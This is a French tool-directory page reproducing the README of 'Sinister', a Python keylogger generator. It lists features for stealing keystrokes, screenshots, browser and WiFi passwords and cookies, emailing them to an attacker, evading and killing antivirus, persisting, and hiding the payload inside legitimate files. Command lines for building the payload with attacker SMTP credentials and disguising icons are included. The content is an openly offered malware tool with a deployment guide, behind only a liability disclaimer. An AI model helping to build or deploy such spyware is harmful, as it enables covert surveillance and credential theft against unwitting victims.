Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Sinister — Sinister est un générateur de keyloggers pour Windows/Linux qui envoie les frappes clavier par e-mail avec d'autres informations juteuses sur la cible. | Kitploit
Outils/GitHubGitHub/pushpenderindia/sinister
Cassage de Mots de PasseGénération de PayloadsMécanismes de PersistanceExfiltration de DonnéesCollecte d'InformationsPost-ExploitationRed TeamingOutil d'Accès à Distance
GitHubpushpenderindia/sinister

Sinister

Sinister est un générateur de keyloggers pour Windows/Linux qui envoie les frappes clavier par e-mail avec d'autres informations juteuses sur la cible.

4659329il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Logo Sinister

Sinister

GIF Hacker

                    Ce petit script Python peut faire un travail vraiment impressionnant.

Sinister est un générateur de keylogger pour Windows/Linux, qui envoie les frappes clavier et les captures d'écran par e-mail, avec d'autres informations juteuses sur la cible, écrit en Python 3.

Avertissement

:computer: Ce projet a été créé uniquement à des fins louables et pour un usage personnel.

CE LOGICIEL EST FOURNI « EN L'ÉTAT » SANS GARANTIE D'AUCUNE SORTE. VOUS POUVEZ UTILISER CE LOGICIEL À VOS PROPRES RISQUES. L'UTILISATION EST DE LA SEULE RESPONSABILITÉ DE L'UTILISATEUR FINAL. LES DÉVELOPPEURS N'ASSUMENT AUCUNE RESPONSABILITÉ ET NE SONT PAS RESPONSABLES DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE CAUSÉ PAR CE PROGRAMME.

Fonctionnalités

  • Fonctionne sur Windows/Linux
  • Notifier une nouvelle victime par e-mail
  • Indétectable
  • Persistance
  • Validation des identifiants e-mail avant la génération de la charge utile.
  • Peut recevoir les frappes clavier via n'importe quel fournisseur de messagerie tel que GMAIL, YAHOO, OUTLOOK, SMTP personnalisé.
  • Serveur/Port SMTP
Nom du serveurServeur SMTPPort SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Envoie une capture d'écran de l'écran du PC de la victime par e-mail
  • Crée un binaire exécutable sans aucune dépendance
  • Crée une charge utile de petite taille (~5 Mo) avec des fonctionnalités avancées
  • Obfusque la charge utile avant de la générer, contournant ainsi quelques antivirus supplémentaires
  • La charge utile générée est encodée en base64, rendant l'ingénierie inverse extrêmement difficile
  • Fonction pour tuer l'antivirus sur le PC de la victime et tenter de désactiver la sécurité
  • Interface colorée impressionnante pour générer la charge utile
  • Côté attaquant : lors de la création de la charge utile, le script détecte automatiquement les dépendances manquantes et les installe
  • Distingue les données de journal en fonction du nom de la fenêtre active (Voir l'image pour mieux comprendre)
  • Possibilité d'ajouter une icône personnalisée au fichier malveillant
  • Lieutenant intégré qui peut lier le keylogger à n'importe quel fichier [.pdf, .txt, .exe, etc.], exécutant le fichier légitime au premier plan et les codes malveillants en arrière-plan en tant que service.
  • Vérifie la présence d'une instance déjà en cours sur le système : si une instance en cours est trouvée, seul le fichier légitime est exécuté [Interdiction d'instances multiples pour éviter de recevoir des journaux en double par e-mail].
  • L'attaquant peut créer/compiler pour les deux systèmes d'exploitation Windows/Linux en utilisant un système Linux, mais ne peut créer/compiler que des exécutables Windows avec une machine Windows.
  • Récupère les mots de passe enregistrés du système victime et les envoie à l'attaquant.
Le voleur intégré peut voler ces éléments :
Navigateur Chrome (mots de passe enregistrés)
WiFi (mots de passe enregistrés)
Cookies Chrome (données de connexion, cookies, historique)
Cookies Firefox (cookies.sqlite)

Remarque : le voleur personnalisé est codé, ne repose pas sur LaZagne

  • Récupère et envoie des informations utiles sur l'appareil de la victime
Ces éléments sont récupérés et envoyés :
Système d'exploitation
Nom de l'ordinateur
Nom d'utilisateur
IPv4 publique
  • Si votre charge utile ne parvient pas à s'exécuter, utilisez --debug pour exécuter l'exe en avant-plan avec CMD

Important

Le 30 mai 2022, Google a supprimé la fonctionnalité des applications moins sécurisées, donc au lieu du mot de passe Gmail :

  • Activez l'authentification à deux facteurs (2FA) sur votre Gmail attaquant
  • Créez un mot de passe d'application spécifique
  • Utilisez ce mot de passe d'application spécifique lors de la création de la charge utile.
  • Comment créer un mot de passe d'application spécifique : Cliquez ici

Testé sur

Kali) Kali Linux - ÉDITION ROULANTE

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prérequis

  • Python 3.X
  • Quelques modules externes

Comment utiliser sous Linux

# Naviguez vers le répertoire /opt (optionnel)
$ cd /opt/

# Clonez ce dépôt
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Déplacez-vous dans le dossier Sinister
$ cd Sinister

# Installez les dépendances
$ bash installer_linux.sh

*** Remarque : lorsque la boîte de dialogue de l'installateur Python apparaît lors de l'exécution de installer_linux.sh ***
    * Cliquez sur installation personnalisée
    * Choisissez le chemin vers : C:/Python37-32
    ### Pour que Python soit installé dans ce chemin (sous Wine) : ~/.wine/drive_c/Python37-32

# Si vous rencontrez des erreurs lors de l'exécution de installer_linux.sh, essayez d'installer avec installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Création de la charge utile/RAT
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP GMAIL, configuration du port (serveur SMTP par défaut = smtp.gmail.com, port SMTP par défaut = 587)
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP OUTLOOK, configuration du port
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -x smtp-mail.outlook.com -y 587 -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP YAHOO, configuration du port
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -x smtp.mail.yahoo.com -y 587 -l -o nom_fichier_sortie --icon chemin_icone

Remarque : Vous pouvez également utiliser nos icônes personnalisées depuis le dossier icon, utilisez-les ainsi : --icon icon/pdf.ico

Comment utiliser sous Windows

# Installez les dépendances
$ Installez la dernière version de Python 3.x
Télécharger l’outil